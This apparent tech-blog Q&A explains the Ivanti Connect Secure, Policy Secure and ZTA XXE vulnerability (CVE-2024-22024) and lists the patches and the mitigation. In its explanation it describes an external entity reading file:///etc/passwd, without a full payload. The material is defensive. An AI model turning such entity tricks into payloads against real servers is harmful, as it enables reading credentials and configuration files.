TechNsight

Ask a Question

XXE Vulnerability in Ivanti’s Products: What You Need to Know and Do

Question:

How can Ivanti’s Connect Secure, Policy Secure, and ZTA gateways be protected from the XXE vulnerability in their SAML component?

This question is more concise and specific, and it focuses on the main issue and the desired solution. It also uses technical terms that an expert would understand, such as XXE, SAML, and gateways.

Answer:

Ivanti, a leading provider of enterprise VPN and network access solutions, recently disclosed a high-severity vulnerability affecting its Connect Secure, Policy Secure, and ZTA gateways. The vulnerability, tracked as CVE-2024-22024, is an XML external entity (XXE) injection flaw that could allow an attacker to access restricted resources on unpatched appliances without authentication.

What is XXE and how does it affect Ivanti’s products?

XXE is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. XML is a widely used format for exchanging data between web applications and servers. XML data can contain various elements, attributes, and entities that define the structure and content of the data. Entities are a way of declaring a value that can be referenced later in the XML document. For example, an entity can be defined as `&name;` and assigned a value of `John`. Then, whenever the entity `&name;` is used in the XML data, it will be replaced by the value `John`.

However, some entities can be defined based on external sources, such as files or URLs. These are called external entities, and they can be used to load data from outside the XML document. For example, an entity can be defined as `&file;` and assigned a value of `file:///etc/passwd`. Then, whenever the entity `&file;` is used in the XML data, it will be replaced by the contents of the file `/etc/passwd` on the server.

This feature of XML can be exploited by an attacker who can control or influence the XML data that is processed by an application. By crafting malicious XML data that contains external entities pointing to sensitive files or URLs, the attacker can trick the application into revealing confidential information or interacting with other systems on behalf of the application. This is known as XXE injection, and it can lead to data leakage, denial of service, server-side request forgery (SSRF), or remote code execution.

Ivanti’s Connect Secure, Policy Secure, and ZTA gateways are affected by an XXE vulnerability in their SAML component. SAML (Security Assertion Markup Language) is a standard protocol for authentication and authorization between web applications. SAML uses XML data to exchange information about the identity and attributes of users and services. Ivanti’s products use SAML to provide single sign-on (SSO) functionality for users accessing various web applications through the gateways.

The XXE vulnerability in Ivanti’s products allows an attacker to craft malicious SAML data that contains external entities pointing to restricted resources on the gateways, such as configuration files, logs, or credentials. The attacker can then send the SAML data to the gateways, which will process the external entities and return the data in the response. This way, the attacker can bypass the authentication and authorization mechanisms of the gateways and access sensitive information or perform unauthorized actions.

How can Ivanti’s customers protect themselves from the XXE vulnerability?

Ivanti has released patches for the XXE vulnerability for the affected versions of its products. Customers who are using Ivanti Connect Secure (version 9.1R14.4, 9.1R17.2, 9.1R18.3, 22.4R2.2 and 22.5R1.1), Ivanti Policy Secure version 22.5R1.1 and ZTA version 22.6R1.3 should apply the patches as soon as possible. The patches are available on Ivanti’s [standard download portal].

Customers who are using other supported versions of Ivanti’s products should apply the mitigation that Ivanti provided on January 31, 2024. The mitigation blocks the vulnerable endpoint on the gateways and prevents the XXE attack from succeeding. The mitigation is also available on Ivanti’s [standard download portal].

Customers who have applied the patches or the mitigation do not need to perform any additional actions to protect themselves from the XXE vulnerability. However, Ivanti recommends that customers run its [External Integrity Checker Tool] to verify the integrity of their gateways and monitor their security logs for any suspicious activity.

Conclusion

The XXE vulnerability in Ivanti’s Connect Secure, Policy Secure, and ZTA gateways is a serious security issue that could expose customers’ data and systems to unauthorized access. Ivanti has taken swift action to address the vulnerability and provide patches and mitigation for its customers. Customers should follow Ivanti’s instructions and apply the appropriate measures to secure their gateways and prevent any potential exploitation of the XXE vulnerability.

Related posts:

  1. Articulating “Otamangle”: A Phonetic Pronunciation Tutorial
  2. Unifying Your Web Experience with OhHai Browser – Corporate Edition’s Sync Capabilities
  3. Tipard’s TS Magic: Creating One File from Many
  4. Evaluating ZoneAlarm Extreme Security’s Ransomware Safeguards
  5. Stellar Visions: Finding the Best Live Space Event Screen Savers
  6. “The Digital Makeover: EasiestSoft’s Role in VHS to DVD Transfers”

Leave a Reply

Your email address will not be published. Required fields are marked *

Privacy Terms Contacts About Us